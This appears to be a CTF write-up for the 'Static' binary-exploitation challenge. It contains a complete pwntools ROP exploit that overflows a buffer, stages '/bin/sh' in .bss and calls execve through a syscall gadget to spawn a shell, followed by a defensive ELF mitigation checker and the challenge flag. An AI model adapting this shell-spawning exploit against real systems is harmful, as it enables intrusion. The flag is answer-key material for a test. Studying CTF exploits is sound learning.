Static

  • Score: 265
  • Technique: ROP

So I heard all about these binary exploitation attacks involving libraries and libc, and that's got me worried! I decided to statically compile all of my binaries to avoid those attack vectors. This means I don't need to worry about mitigations, right? Right??

Script

from pwn import *

elf = context.binary = ELF('./static')

r = remote('static.chal.cyberjousting.com', 1350)
# r = gdb.debug('./static', gdbscript='''break*0x401808''')
# r = elf.process()

# Gadgets found inside the statically linked binary itself (no libc needed):
syscall = p64(0x401194)          # syscall; ret
pop_rax_rdx_rbx = p64(0x45e466)  # pop rax; pop rdx; pop rbx; ret
pop_rdi = p64(0x401fe0)          # pop rdi; ret
pop_rsi = p64(0x4062d8)          # pop rsi; ret

padding = b'A'*18                # bytes from the buffer start to the saved return address

read = p64(elf.symbols.read)     # libc's read() is linked into the binary
bss = p64(0x49f110)              # writable, fixed address (no PIE) to stage "/bin/sh"
vuln = p64(elf.symbols.vuln)     # return into the vulnerable function for a second overflow
ret = p64(next(elf.search(asm('ret'))))  # lone ret to realign the stack before the call
exit = p64(elf.symbols.exit)

# Stage 1: read(0, bss, 9) -> "/bin/sh\x00" lands in .bss, then return to vuln
#   rdi = 0 (stdin), rsi = bss, rax = 0, rdx = 9 (count), rbx = 0 (unused)
payload = padding + ret + pop_rdi + p64(0) + pop_rsi + bss + pop_rax_rdx_rbx + p64(0) + p64(9) + p64(0) + read + vuln
r.sendline(payload)

r.sendline(b'/bin/sh\x00')

# Stage 2: execve("/bin/sh", NULL, NULL) via the raw syscall gadget
#   rdi = bss ("/bin/sh"), rax = 59 (SYS_execve), rdx = 0 (envp), rbx = 0, rsi = 0 (argv)
payload2 = b'A'*18 + ret + pop_rdi + bss + pop_rax_rdx_rbx + p64(59) + p64(0) + p64(0) + pop_rsi + p64(0) + syscall + exit
r.sendline(payload2)

r.interactive()
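As an added illustration (not part of the writeup), the check a defender would run before trusting "it's static, so I'm fine": parse the ELF header and program headers to see which mitigations the binary actually carries. Static linking normally produces an ET_EXEC image, so there is no PIE and every gadget address above is fixed; NX depends only on the PT_GNU_STACK flags and is independent of how the binary was linked. The sample ELF bytes are constructed here for the test; stack-canary detection (looking for __stack_chk_fail in the symbol table) is left out.

```python
import struct
import sys

# ELF64 constants from the ELF specification
ET_EXEC, ET_DYN = 2, 3
PT_GNU_STACK = 0x6474E551
PF_X = 1

def elf_mitigations(data: bytes) -> dict:
    """Report PIE and NX for an ELF64 image given as bytes.

    pie: True only for ET_DYN images (a static binary is usually ET_EXEC,
         so ROP gadget addresses never move between runs).
    nx:  True when PT_GNU_STACK is present without PF_X; a missing
         PT_GNU_STACK header means the kernel gives an executable stack.
    """
    if data[:4] != b'\x7fELF' or data[4] != 2:   # EI_CLASS 2 == ELFCLASS64
        raise ValueError('not an ELF64 image')
    e_type, = struct.unpack_from('<H', data, 16)
    e_phoff, = struct.unpack_from('<Q', data, 32)
    e_phentsize, e_phnum = struct.unpack_from('<HH', data, 54)
    nx = False
    for i in range(e_phnum):
        off = e_phoff + i * e_phentsize
        p_type, p_flags = struct.unpack_from('<II', data, off)
        if p_type == PT_GNU_STACK:
            nx = not (p_flags & PF_X)
    return {'pie': e_type == ET_DYN, 'nx': nx}

def build_sample_elf(e_type: int, stack_flags: int) -> bytes:
    """Constructed, non-runnable ELF64: header plus one PT_GNU_STACK entry (test input)."""
    ident = b'\x7fELF' + bytes([2, 1, 1, 0]) + b'\x00' * 8
    # e_type, e_machine(x86-64), e_version, e_entry, e_phoff, e_shoff, e_flags,
    # e_ehsize, e_phentsize, e_phnum, e_shentsize, e_shnum, e_shstrndx
    ehdr = ident + struct.pack('<HHIQQQIHHHHHH', e_type, 0x3E, 1, 0x401000,
                               64, 0, 0, 64, 56, 1, 64, 0, 0)
    phdr = struct.pack('<IIQQQQQQ', PT_GNU_STACK, stack_flags, 0, 0, 0, 0, 0, 16)
    return ehdr + phdr

if __name__ == '__main__':
    # Usage: python3 elf_mitigations.py ./static
    with open(sys.argv[1], 'rb') as f:
        print(elf_mitigations(f.read()))
```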

Flag

byuctf{glaD_you_c0uld_improvise_ROP_with_no_provided_gadgets!}